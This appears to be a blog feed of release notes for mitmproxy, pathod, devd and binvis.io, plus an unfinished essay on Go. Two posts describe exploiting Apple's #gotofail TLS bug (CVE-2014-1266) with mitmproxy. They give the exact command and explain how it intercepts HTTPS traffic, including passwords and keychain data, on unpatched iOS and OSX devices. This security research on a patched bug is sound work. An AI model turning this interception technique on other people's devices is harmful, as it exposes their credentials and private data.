<li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert
bundle is stored in ~/.devd.cert</li>
<li>Add the X-Forwarded-Host header to reverse proxied traffic.</li>
<li>Disable upstream cert validation for reverse proxied traffic. This makes
using self-signed certs for development easy. Devd shoudn't be used in
contexts where this might pose a security risk.</li>
<li>Bugfix: make CSS livereload work in Firefox</li>
<li>Bugfix: make sure the Host header and SNI host matches for reverse proxied
traffic.</li>
</ul>
mitmproxy: release v0.14
2015-11-07T00:00:00+00:00
2015-11-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_14/
<div class="media">
<a href="https://mitmproxy.org">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>We've just released <a href="http://www.mitmproxy.org">mitmproxy 0.14</a>! Since the last
release, the project has had 399 commits by 13 contributors, resulting in 79
closed issues and 37 closed PRs, all of this in just over 100 days.</p>
<ul>
<li>Docs: Greatly updated docs <a href="http://docs.mitmproxy.org">now hosted on ReadTheDocs</a></li>
<li>Docs: Fixed Typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han,
onlywade, Jurriaan Bremer)</li>
<li>mitmdump: Colorized TTY output</li>
<li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)</li>
<li>mitmproxy and mitmdump: Support for displaying UTF8 contents</li>
<li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)</li>
<li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)</li>
<li>mitmweb: bug fixes (Colin Bendell)</li>
<li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.</li>
<li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. This
yields a massive speedup for TLS handshakes.</li>
<li>libmproxy: Prevent unneccessary upstream connections (macmantrl)</li>
<li>Inline Scripts: New <a href="http://docs.mitmproxy.org/en/latest/dev/models.html#netlib.http.Headers">API for HTTP
Headers</a></li>
<li>Inline Scripts: Properly handle exceptions in <code>done</code> hook</li>
<li>Inline Scripts: Allow relative imports, provide <code>__file__</code></li>
<li>Examples: Add probabilistic TLS passthrough as an inline script</li>
<li>netlib: Refactored HTTP protocol handling code</li>
<li>netlib: ALPN support</li>
<li>netlib: fixed a bug in the optional certificate verification.</li>
<li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)</li>
</ul>
<p>I had very little time to spend on mitmproxy this cycle due to an
extraordinarily busy patch at work - so, all of the above was shepherded into
being by my hyper-efficient co-maintainer, <a href="https://maximilianhils.com/">Maximilian
Hils</a>. Having a steady pair of hands to keep
things on track while I've been "absent" has been great. As a project, we'd
also like to thank Google, who sponsored the work of <a href="https://github.com/Kriechi">Thomas
Kriechbaumer</a> under the <a href="https://developers.google.com/open-source/soc/">Google Summer of
Code</a> program, and the
<a href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work
was done. The excellent work Thomas has done on HTTP2 support and many, many
other aspects of mitmproxy has been invaluable. Look for new releases building
on this soon.</p>
devd v0.2 (and some thoughts on small tools)
2015-11-05T00:00:00+00:00
2015-11-05T00:00:00+00:00
https://corte.si/posts/devd/0.2/
<p>I've just released <a href="https://github.com/cortesi/devd/releases">version 0.2 of
devd</a>, a local webserver for
developers. This release contains a number of small improvement, and a few new
features.</p>
<ul>
<li>-x (--exclude) flag to exclude files from livereload.</li>
<li>-P (--password) flag for quick HTTP Basic password protection.</li>
<li>-q (--quiet) flag to suppress all output from devd.</li>
<li>Humanize file sizes in console logs.</li>
<li>Improve directory indexes - better formatting, they now also livereload.</li>
<li>Devd's built-in livereload URLs are now less likely to clash with user URLs.</li>
<li>Internal 404 pages are now included in logs, timing measurement, and
filtering.</li>
<li>Improved heuristics for livereload file change detection. We now handle
things like transient files created by editors better.</li>
<li>A Linux ARM build will now be distributed with each release.</li>
</ul>
<p>Thanks to <a href="http://brennie.ca">Barret Rennie</a>, <a href="http://billmill.org">Bill Mill</a>
and Judson Mitchell (<a href="mailto:judsonmitchell@gmail.com">judsonmitchell@gmail.com</a>) for contributing to this
release.</p>
<h1 id="some-thoughts-on-small-tools">Some thoughts on small tools</h1>
<p>I love small, modest tools that do one thing well. I wrote devd partly out of
nostalgia for <a href="http://acme.com/software/thttpd/">thttpd</a>, a tiny web daemon that
used to be my rough-and-ready, just-serve-files-now webserver for many years. It
was a single, small binary that I could cross-compile for all the platforms I
used, and it did its humble job well. Back in the day, it was one of the first
things I put on every new box, along with my shell configuration and ssh keys.
When it started showing its age, I moved on to the usual combination of built-in
interpreter daemons (e.g. "python -m SimpleHTTPServer") and more heavy-handed
tools, but not without a touch of sadness. Looking back on it now, it's clear
that the thttpd I remember is a somewhat rose-tinted version of the real thing:
thttpd actually did both more and less than I really needed. Devd strives to be
a tool in the same sprit, that matches more closely what I want in my
<a href="https://en.wikipedia.org/wiki/Everyday_carry">EDC</a> http daemon. If people think
of it as a small, dependable and unobtrusive part of their daily toolset, I'll
have done <em>my</em> job well.</p>
<p>This release includes a few new features for devd, and the next release will add
a few more. Not long after that, I expect it to be more or less feature
complete. It will continue to improve internally, and bugs will always be fixed,
but it will never sprout the ability to run PHP or render less on the fly (both
feature requests I've had since the first release). Instead, it will focus on
doing the few things it does as well as it can: serve files, act as a reverse
proxy tying development servers together, and live reload when files change.</p>
devd: a web daemon for developers
2015-10-23T00:00:00+00:00
2015-10-23T00:00:00+00:00
https://corte.si/posts/devd/intro/
<p>I've just released <a href="https://github.com/cortesi/devd">devd</a>, a small,
self-contained, command-line-only HTTP server for developers. It started as a
weekend stress-relief hack (that's a thing where I'm from), but has now become
my preferred "daily driver" for most web-ish things. It's simple, direct and
does more or less exactly what I need. This isn't terribly surprising, since I
wrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy
hackers will find it useful too.</p>
<h2 id="quick-start">Quick start</h2>
<p>Serve the current directory, open it in the browser (<strong>-o</strong>), and livereload
when files change (<strong>-l</strong>):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -ol</span><span style="color:#c0c5ce;"> .
</span></code></pre>
<p>Reverse proxy to http://localhost:8080, and livereload when any file in the
<strong>src</strong> directory changes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -w</span><span style="color:#c0c5ce;"> ./src http://localhost:8080
</span></code></pre><h2 id="features">Features</h2>
<h3 id="cross-platform-and-self-contained">Cross-platform and self-contained</h3>
<p>Devd is a single statically compiled binary with no external dependencies, and
is released for OSX, Linux and Windows. Don't want to install Node or Python in
that light-weight Docker instance you're hacking in? Just copy over the devd
binary and be done with it.</p>
<h3 id="designed-for-the-terminal">Designed for the terminal</h3>
<p>This means no config file, no daemonization, and logs that are designed to be
read in the terminal by a developer. Logs are colorized and log entries span
multiple lines. Devd's logs are detailed, warn about corner cases that other
daemons ignore, and can optionally include things like detailed timing
information and full headers.</p>
<div class="media">
<a href="https://github.com/cortesi/devd">
<img src="./devd-terminal.png" />
</a>
</div>
<p>To make quickly firing up an instance as simple as possible, devd automatically
chooses an open port to run on (unless it's specified), and can open a browser
window pointing to the daemon root for you (the <strong>-o</strong> flag in the example
above).</p>
<h3 id="livereload">Livereload</h3>
<p>When livereload is enabled, devd injects a small script into HTML pages, just
before the closing <em>head</em> tag. The script listens for change notifications over
a websocket connection, and reloads resources as needed. No browser addon is
required, and livereload works even for reverse proxied apps. If only changes
to CSS files are seen, devd will only reload external CSS resources, otherwise
a full page reload is done. This serves the current directory with livereload
enabled:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -l</span><span style="color:#c0c5ce;"> .
</span></code></pre>
<p>You can also trigger livereload for files that are not being served, letting
you reload reverse proxied applications when source files change. So, this
command watches the <em>src</em> directory tree, and reverse proxies to a locally
running application:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -w</span><span style="color:#c0c5ce;"> ./src http://localhost:8888
</span></code></pre><h3 id="reverse-proxy-static-file-server-flexible-routing">Reverse proxy + static file server + flexible routing</h3>
<p>Modern apps tend to be collections of web servers, and devd caters for this
with flexible reverse proxying. You can use devd to overlay a set of services
on a single domain, add livereload to services that don't natively support it,
add throttling and latency simulation to existing services, and so forth.</p>
<p>Here's a more complicated example showing how all this ties together - it
overlays two applications and a tree of static files. Livereload is enabled for
the static files (<strong>-l</strong>) and also triggered whenever source files for reverse
proxied apps change:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -l </span><span style="color:#c0c5ce;">\
</span><span style="color:#bf616a;">-w</span><span style="color:#c0c5ce;"> ./src/ \
/=http://localhost:8888 \
/api/=http://localhost:8889 \
/static/=./assets
</span></code></pre><h3 id="light-weight-virtual-hosting">Light-weight virtual hosting</h3>
<p>Devd uses a dedicated domain - <strong>devd.io</strong> - to do simple virtual hosting. This
domain and all its subdomains resolves to 127.0.0.1, which we use to set up
virtual hosting without any changes to <em>/etc/hosts</em> or other local
configuration. Route specifications that don't start with a leading <strong>/</strong> are
taken to be subdomains of <strong>devd.io</strong>. So, the following command serves a
static site from devd.io, and reverse proxies a locally
running app on api.devd.io:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd</span><span style="color:#c0c5ce;"> ./static api=http://localhost:8888
</span></code></pre>
<p>Check out the docs at <a href="https://github.com/cortesi/devd">the Github repo</a> for
the full route specification syntax.</p>
<h3 id="latency-and-bandwidth-simulation">Latency and bandwidth simulation</h3>
<p>Want to know what it's like to use your fancy 5mb HTML5 app from a mobile phone
in Botswana? Look up the bandwidth and latency
<a href="http://www.cisco.com/c/en/us/solutions/collateral/service-provider/global-cloud-index-gci/CloudIndex_Supplement.html">here</a>,
and invoke devd like so (making sure to convert from kilobits per second to
kilobytes per second):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">devd -d</span><span style="color:#c0c5ce;"> 114</span><span style="color:#bf616a;"> -u</span><span style="color:#c0c5ce;"> 51</span><span style="color:#bf616a;"> -l</span><span style="color:#c0c5ce;"> 75 .
</span></code></pre>
<p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it
uses a token bucket implementation for throttling, properly handles concurrent
requests, and chunks traffic up so data flow is smooth.</p>
mitmproxy: release v0.13
2015-07-26T00:00:00+00:00
2015-07-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_13/
<div class="media">
<a href="../announce_0_12_1/mitmproxy_0_12_1.gif">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>This is a slightly late announcement of the release of <a href="https://mitmproxy.org">mitmproxy
v0.13</a>, which was pushed out the door earlier this week
by my esteemed compatriots while I was tied up with other things. We have a
number of big new features this time round. First, mitmproxy now has upstream
certificate validation, thanks to the hard work of <a href="https://github.com/kyle-m">Kyle
Morton</a>. Mitmproxy is increasingly being used in
user-oriented roles where upstream cert validation is crucial, so this is a
welcome improvement. We also have a new transparent proxy mode, which uses the
HTTP Host headers to detect the upstream server to connect to, rather than the
OS NAT tables. This isn't accurate 100% of the time, but it's so convenient
that having it in the base makes sense. Thanks to
<a href="https://github.com/ijiro123">Ijiro123</a>. Other improvements include include
marking of flows in mitmproxy console (thanks to <a href="https://github.com/drahosj">Jake
Drahos</a>) and and an addition to the filter language
allowing better matching of source and destination addresses (thanks to <a href="https://github.com/isra17">Israel
Halle</a>)</p>
<p>This release also features something a bit more unusual: a removed feature. We
added the ability to forward server certificates through to the client verbatim
to allow mitmproxy to exploit the infamous
<a href="https://www.imperialviolet.org/2014/02/22/applebug.html">#gotofail</a> bug on IOS
and OSX. We were one of the first (and perhaps THE first) publicly available
mechanisms to exploit this issue, and pen testers, app reversers and curious
folks everywhere rejoiced. Unfortunately, cert forwarding has become a support
burden - for fiddly technical reasons, it adds a lot of complication to the way
mitmproxy is distributed and installed. Since #gotofail is no longer so
current, we've decided to remove support from mitmproxy. If you still have some
vulnerable devices out there you need to muck with, the official answer at the
moment is to install v0.12.</p>
mitmproxy v0.12.1
2015-06-04T00:00:00+00:00
2015-06-04T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_12_1/
<div class="media">
<a href="mitmproxy_0_12_1.gif">
<img src="mitmproxy_0_12_1.gif" />
</a>
</div>
<p>I've just released <a href="http://mitmproxy.org">mitmproxy v0.12.1</a>. This release
fixes a few crashing bugs that slipped through in the previous iteration, so
everyone should upgrade.</p>
<p>Also included are a number of small improvements. The most noticeable of these
is mouse interaction for mitmproxy console - the screen capture above shows me
scrolling with my mouse, clicking to view a flow and switch tabs. We pay a
small price for this - users now have to hold down a modifier key (shift on
some systems, alt on others) to select text in the terminal for copying and
pasting. To ease users into this, we've added a warning if we detect an attempt
to select text without the right modifier key.</p>
mitmproxy: release v0.12 and some project news
2015-05-26T00:00:00+00:00
2015-05-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_12/
<h2 id="project-news">Project News</h2>
<p>Before we get to the new release, I'd like to give a quick update on some
internal project developments.</p>
<p>First up, after a somewhat involved process that included a couple of rounds of
community voting and much discussion, we have a new logo:</p>
<div class="media">
<a href="mitmproxy-long.png">
<img src="mitmproxy-long.png" />
</a>
</div>
<p>This will be rolled out in all the places where it makes sense along with the
0.12 release.</p>
<p>Second, the long-dormant <a href="http://twitter.com/mitmproxy">@mitmproxy</a> Twitter
account is finally waking up. Please follow us there for mitmproxy project
updates and related news.</p>
<p>Third, we'd like to welcome <a href="https://github.com/Kriechi">Thomas Kriechbaumer</a>
to the project. Thomas is being sponsored to work on mitmproxy under the
<a href="https://developers.google.com/open-source/soc/">Google Summer of Code</a>
program, and will be adding HTTP2 support - one of our most anticipated
features. Special thanks goes to the <a href="https://www.honeynet.org/">Honeynet
Project</a> under whose aegis the GSoC work will be
done.</p>
<p>Lastly, a peek into the project's immediate future. We have websockets support
on the way, thanks to a protocol contribution by <a href="https://github.com/Chandler">Chandler
Abraham</a>. We have HTTP2 on the way, thanks to
Thomas. The mitmproxy web interface is gradually maturing behind the scenes,
and should be ready to be unleashed on the world soon. And, of course, the
project continues to improve quickly in almost every other respect. It's an
exciting time, and there's a lot of interesting work to do - if you'd like to
be involved, please get in touch.</p>
<h2 id="mitmproxy-v0-12">mitmproxy v0.12</h2>
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>The most immediately visible change in v0.12 is a thorough overhaul of the
console interface, which has been improved in almost every respect. Performance
and responsiveness is better, keybindings have been consolidated, and options
have been collected in a dedicated options screen (shortcut "o"). Palettes have
been overhauled entirely, with improvements to the palettes themselves, the
ability to change palettes on the fly, and support for non-transparent
(mitmproxy sets the console background) and transparent (your emulator sets the
console background) modes. The console application has also sprouted a powerful
new cookie editor that will make tampering with cookie names and values more
convenient.</p>
<p>Other major features include official support for transparent mode on FreeBSD
(thanks to <a href="http://github.com/mike-pt">Mike C</a>), the ability to log TLS master
keys for use with other tools like WireShark, support for creating flows from
scratch in the console app (thanks <a href="https://github.com/gato">Marcelo Glezer</a>).
A thorough overhaul of the documentation is also under way - thanks to <a href="https://github.com/elitest">Jim
Shaver</a> for his work there.</p>
<h2 id="pathod-v0-12">pathod v0.12</h2>
<p>I'm also releasing pathod v0.12. The primary change here is the first phase of
full support for websockets. At the moment, this is client-only - server
support will follow in the next release.</p>
<p>Here's a taster - the pathoc command below initiates a websocket connection to
echo.websockets.org, then sends 10 websocket frames, each with a body of 100
random bytes.</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> ./pathoc </span><span style="color:#bf616a;">echo.websockets.org</span><span style="color:#c0c5ce;"> ws:/ wf:b@100:x10
>> ws:/
<< </span><span style="color:#d08770;">200 </span><span style="color:#bf616a;">OK:</span><span style="color:#c0c5ce;"> 225 bytes
>> wf:b@100:ir,@1
</span></code></pre>
<p>The usual range of injections and stream manipulations are available, and every
aspect of the websocket frames can be manipulated in ways that creatively
violate the specs. See the pathod documentation for the language definition.</p>
binvis.io - a browser-based tool for visualising binary data
2015-03-04T00:00:00+00:00
2015-03-04T00:00:00+00:00
https://corte.si/posts/binvis/announce/
<p>Over the years, I've written a number of posts on this blog on the topic of
binary data visualisation. I looked at <a href="https://corte.si/posts/visualisation/binvis/">using space-filling curves to understand
the structure of binary data</a>, I've
showed how <a href="https://corte.si/posts/visualisation/entropy/">entropy visualisation lets you trivially pick out compressed and
encrypted sections</a>, and I've drawn
<a href="https://corte.si/posts/visualisation/malware/">pretty pictures of malware</a>.
Unfortunately the tools I wrote (<a href="https://github.com/cortesi/scurve">code here</a>)
all produced static images, which made making practical use a pain. You really
need interactivity to be able to combine visual exploration with inspection of
the actual underlying data, and to let you easily export interesting sections.</p>
<h2 id="binvis-io"><a href="http://binvis.io">binvis.io</a></h2>
<p>l recently started toying with the idea of using web technologies to build an
interactive visualiser of this sort. One thing led to another... and today, I'm
happy to announce a first draft of the idea: binvis.io</p>
<div class="media">
<a href="http://binvis.io/#/view/examples/elf-Linux-ARMv7-ls.bin?colors=entropy">
<img src="binvis.png" />
</a>
</div>
<p>With binvis.io you can:</p>
<ul>
<li>Visually explore binary data</li>
<li>Cluster bytes to pick out fine structural features with space-filling
curves</li>
<li>Use the simple scan layout to navigate and select data intuitively</li>
<li>Flip between a number of useful byte color mappings, including an entropy
visualiser that lets you pick out compressed or encrypted sections</li>
<li>Export data segments for analysis</li>
</ul>
<h2 id="next-steps">Next steps</h2>
<p>Right now, Binvis is local only - that is, when you open a file, all analysis is
done in your browser and nothing is sent to the server. In the longer term, I'd
like to add the ability to upload, share and annotate binaries, both publicly
and privately. There is probably a market of... oh, at least a dozen people out
there who would have use for an imgur-like sharing system for binaries. Fame and
riches surely await. Of course, there are also an immense number of other
improvements to be made to almost every aspect of binvis, ranging from speed, to
better colour schemes, to improvements in interaction and UX.</p>
<p>The todo list is long, and time is short, so I'm looking for serious
collaborators. If you're interested, drop me a line!</p>
<h2 id="thanks">Thanks</h2>
<p>Binvis isn't the first interactive binary visualisation tool of this sort. A few
others that spring to mind are
<a href="https://sites.google.com/site/xxcantorxdustxx/about">..cantor.dust</a>,
<a href="https://github.com/joesavage/binspect">bininspect</a> and
<a href="https://github.com/wapiflapi/binglide">binglide</a>. I'm trying to learn from
these precursors, and I'm delighted to see that they all also drew, to a greater
or lesser extent, on my earlier work. Thus the eternal cycle of code rolls on.</p>
<p>I'd like to particularly thank <a href="http://www.rumint.org/gregconti/">Greg Conti</a>
for letting me re-use the name of <a href="https://code.google.com/p/binvis/">his own, much earlier visualisation
tool</a>, for publishing a fascinating series of
<a href="http://www.rumint.org/gregconti/publications/taxonomy-bh.pdf">papers</a> and
<a href="https://vimeo.com/15633207">talks</a> on the topic, and for providing feedback
both on this particular incarnation of the idea as well as my earlier dabblings.</p>
mitmproxy 0.11.2
2014-12-29T00:00:00+00:00
2014-12-29T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_11_2/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just pushed <a href="http://mitmproxy.org">mitmproxy v0.11.2</a> out the door. This is
primarily a bugfix release, but does have one very useful new feature:
configuration files. All options available through command-line flags can now be
set persistently in config files, for all the tools - <a href="http://mitmproxy.org/doc/config.html">see the documentation for
more</a>. Adding this was made much easier by
<a href="https://github.com/zorro3/ConfigArgParse">ConfigArgParse</a>, one of those small
Python project gems that you feel more people should know about. Check it out.</p>
<p>This release also features the usual array of bugfixes and small improvements.
In particular, we know handle upstream servers that knock back connections
without SNI better, and the onboarding app now works in the OSX binary builds.
Everyone should update.</p>
mitmproxy and pathod 0.11
2014-11-07T00:00:00+00:00
2014-11-07T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_11/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I'm happy to announce that we've just released v0.11 of both
<a href="http://mitmproxy.org">mitmproxy</a> and <a href="http://pathod.net">pathod</a>. This release
features a huge revamp of mitmproxy's internals and a long list of important
features. Pathod has much improved SSL support and fuzzing.</p>
<p>Our thanks to the many testers and [contributors](https:
//github.com/mitmproxy/mitmproxy/blob/master/CONTRIBUTORS) that helped get this
out the door. Please lodge bug reports and feature requests
<a href="https://github.com/mitmproxy/mitmproxy/issues">here</a>.</p>
<h2 id="mitmproxy-changelog">Mitmproxy Changelog</h2>
<ul>
<li>Performance improvements for mitmproxy console</li>
<li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server</li>
<li>Data streaming for response bodies exceeding a threshold
(bradpeabody@gmail.com)</li>
<li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic
untouched</li>
<li>Finer-grained control of traffic replay, including options to ignore
contents or parameters when matching flows (marcelo.glezer@gmail.com)</li>
<li>Pass arguments to inline scripts</li>
<li>Configurable size limit on HTTP request and response bodies</li>
<li>Per-domain specification of interception certificates and keys (see
--cert option)</li>
<li>Certificate forwarding, relaying upstream SSL certificates verbatim (see
--cert-forward)</li>
<li>Search and highlighting for HTTP request and response bodies in
mitmproxy console (pedro@worcel.com)</li>
<li>Transparent proxy support on Windows</li>
<li>Improved error messages and logging</li>
<li>Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com)</li>
<li>Content view mode for WBXML (davidshaw835@air-watch.com)</li>
<li>Better documentation, with a new section on proxy modes</li>
<li>Generic TCP proxy mode</li>
<li>Countless bugfixes and other small improvements</li>
</ul>
<h2 id="pathod-changelog">Pathod Changelog</h2>
<ul>
<li>Hugely improved SSL support, including dynamic generation of certificates
using the mitproxy cacert</li>
<li>pathoc -S dumps information on the remote SSL certificate chain</li>
<li>Big improvements to fuzzing, including random spec selection and memoization
to avoid repeating randomly generated patterns</li>
<li>Reflected patterns, allowing you to embed a pathod server response
specification in a pathoc request, resolving both on client side. This makes
fuzzing proxies and other intermediate systems much better.</li>
</ul>
mitmproxy now supports #gotofail
2014-03-11T00:00:00+00:00
2014-03-11T00:00:00+00:00
https://corte.si/posts/security/gotofail-mitmproxy/
<p>A few weeks ago, I posted that I had hacked up <a href="https://corte.si/posts/security/cve-2014-1266/">a version of mitmproxy that
exploited CVE-2014-1266</a>, giving unrestricted
access to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not
to release working code at the time, but a number of
<a href="https://github.com/gabrielg/CVE-2014-1266-poc">POCs</a> have been floating about
publicly almost since the issue was first discovered. So, the time has come to
publish - as of yesterday, <a href="https://github.com/mitmproxy/mitmproxy">mitmproxy's master
branch</a> supports #gotofail.</p>
<p>To see the exploit in action, invoke mitmproxy as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">mitmproxy --ciphers</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">DHE-RSA-AES256-SHA</span><span style="color:#c0c5ce;">"</span><span style="color:#bf616a;"> --cert-forward
</span></code></pre>
<p>After configuring your device proxy, you should see something like this
screenshot, which shows off interception of miscellaneous iTunes traffic:</p>
<div class="media">
<a href="./gotofail-mitmproxy.png">
<img src="./gotofail-mitmproxy.png" />
</a>
</div>
<p>Note that the client device here has no mitmproxy CA certificate installed, and
we get circumvention of certificate pinning "for free".</p>
<p>Two new options make the magic work. The <strong>--ciphers</strong> option specifies which
SSL ciphers we should expose to connecting clients. In this case, we force the
client to use a DHE cipher, which is required to trigger the issue. The
<strong>--cert-forward</strong> option tells mitmproxy to pass upstream SSL certificates
down to the client unmodified. Usually we'd expect this to fail, since the
upstream certs won't match mitmproxy's private key. In this case #gotofail
means the client fails to properly execute the check, letting us pass
certificates through to the client verbatim as if we owned them.</p>
<p>There's one additional wrinkle that mitmproxy smooths over - before we can get
the mismatching certificate and key to the client, OpenSSL itself has to be
coaxed into accepting them. The first version of my exploit involved a patch
to OpenSSL to remove the library's own consistency check, but this is
inconvenient. Luckily it turns out that we can <a href="https://github.com/mitmproxy/netlib/blob/master/netlib/certffi.py">munge an obscure
flag</a> in the
RSA data-structures to circumvent this, which allows us to exploit #gotofail in
pure Python.</p>
<p>The moment I got this exploit working, I marched upstairs and confiscated my
wife's un-updated iPhone 5 to add it to my pool of test devices (never fear -
it's been replaced with a nice new 5S). Devices running IOS of the right
vintage have suddenly become the gold standard for analysis and pen testing.
This beautiful vulnerability lets us circumvent SSL effortlessly, completely
sidestepping certificate pinning for all the applications I've tried, without
any <a href="https://github.com/iSECPartners/ios-ssl-kill-switch">cumbersome and invasive interference with the
device</a>. Combine this with
the fact that these same devices also have an un-tethered jailbreak, and I think
it's unlikely that we'll ever have an analysis platform this nice again. So,
stockpile your IOS 7.0.6 devices now, and intercept all the things.</p>
Exploiting CVE-2014-1266 with mitmproxy
2014-02-25T00:00:00+00:00
2014-02-25T00:00:00+00:00
https://corte.si/posts/security/cve-2014-1266/
<p>This post is a quick recap of work I've been discussing on Twitter in the last
few hours. I've just finished putting together a version of
<a href="http://mitmproxy.org">mitmproxy</a> that takes advantage of
<a href="http://support.apple.com/kb/HT6147">CVE-2014-1266</a>, Apple's <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">critical SSL/TLS
bug</a>. We knew in theory
that the issue should give access to all SSL traffic using Apple's broken
implementation - I can now report that this is also true in practice.</p>
<p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior
to 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames,
passwords, and even Apple app updates can be captured. This includes:</p>
<ul>
<li>App store and software update traffic</li>
<li>iCloud data, including KeyChain enrollment and updates</li>
<li>Data from the Calendar and Reminders</li>
<li>Find My Mac updates</li>
<li>Traffic for applications that use certificate pinning, like Twitter</li>
</ul>
<p>It's difficult to over-state the seriousness of this issue. With a tool like
mitmproxy in the right position, an attacker can intercept, view and modify
nearly all sensitive traffic. This extends to the software update mechanism
itself, which uses HTTPS for deployment.</p>
<p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took
less than a day to get the patched version of mitmproxy and its supporting
libraries up and running. I won't be releasing my patches until well after
Apple's pending update, but it's safe to assume that this is now being exploited
in the wild. Of course, intelligence agencies have no doubt been on top of this
for some time - perhaps some of the <a href="http://news.yahoo.com/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html">inflammatory Sochi security horror
stories</a>
were plausible after all.</p>
mitmproxy and pathod 0.10
2014-01-29T00:00:00+00:00
2014-01-29T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_10/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just released v0.10 of both <a href="http://mitmproxy.org">mitmproxy</a> and
<a href="http://pathod.org">pathod</a>. This is chiefly a bugfix release, with a few nice
additional features to sweeten the pot.</p>
<div class="media">
<a href="mitmproxy-webapp.png">
<img src="mitmproxy-webapp.png" />
</a>
</div>
<p>Perhaps the most visible change has been a huge improvement in the recommended
method for installing the mitmproxy certificates. Certs are now served straight
from the web application hosted in mitmproxy, which means that in most cases
cert installation is as simple as typing the mitmproxy URL into the devce
driver. <a href="http://mitmproxy.org/doc/certinstall/webapp.html">See the docs</a> for
more.</p>
<p>In other, minor news - I see that the <a href="https://github.com/mitmproxy/mitmproxy">mitmproxy
project</a> has just passed 2000 stars on
GitHub. Between PyPi and the files we serve from
<a href="http://mitmproxy.org">mitmproxy.org</a>, the project has also seen nearly 100k
downloads in the last year (after removing obvious bots). I know, I know -
figures like these don't mean much, but it's still nice to see that people are
using and enjoying mitmproxy.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Support for multiple scripts and multiple script arguments</li>
<li>Easy certificate install through the in-proxy web app, which is now
enabled by default</li>
<li><a href="http://mitmproxy.org/doc/features/forwardproxy.html">Forward proxy mode</a>,
that forwards proxy requests to an upstream HTTP server</li>
<li>Reverse proxy now works with SSL</li>
<li>Search within a request/response using the "/" and "n" shortcut keys</li>
<li>A view that beatifies CSS files if cssutils is available</li>
<li>Many bug fix, documentation improvements, and more.</li>
</ul>
How I Learned to Stop Worrying and Love Golang
2013-11-21T00:00:00+00:00
2013-11-21T00:00:00+00:00
https://corte.si/posts/code/go/golang-practicaly-beats-purity/
<p>Here's a riff on Malcolm Gladwell's <a href="http://en.wikipedia.org/wiki/Outliers_(book)">rule of thumb about
mastery</a>: you don't really know
a programming language until you've written 10,000 lines of production-quality
code in it. Like the original this is a generalization that is undoubtedly false
in many cases - still, it broadly matches my intuition for most languages and
most programmers<sup class="footnote-reference"><a href="#3">1</a></sup>. At the beginning of this year, I wrote <a href="https://corte.si/posts/code/go/go-rant/">a sniffy post
about Go</a> when I was about 20% of the way to knowing
the language by this measure. Today's post is an update from further along the
curve - about 80% - following a recent set of adventures that included entirely
rewriting <a href="http://choir.io">choir.io</a>'s core dispatcher in Go. My opinion of Go
has changed significantly in the meantime. Despite my initial exasperation, I
found that the experience of actually writing Go was not unpleasant. The shallow
issues became less annoying over time (perhaps just due to habituation), and the
deep issues turned out to be less problematic in practice than in theory. Most
of all, though, I found Go was just a fun and productive language to work in. Go
has colonized more and more use cases for me, to the point where it is now
seriously eroding my use of both Python and C.</p>
<p>After my rather slow Road to Damascus experience, I noticed something odd: I
found it difficult to explain why Go worked so well in practice. Sure, Go has a
triad of really smashing ideas (interfaces, channels and goroutines), but my
list of warts and annoyances is long enough that it's not clear on paper that
the upsides outweigh the downsides. So, my experience of actually cutting code
in Go was at odds with my rational analysis of the language, which bugged me.
I've thought about this a lot over the last few months, and eventually came up
with an explanation that sounds like nonsense at first sight: Go's weaknesses
are also its strengths. In particular, many design choices that seem to reduce
coherence and maintainability at first sight actually combine to give the
language a practical character that's very usable and compelling. Lets see if I
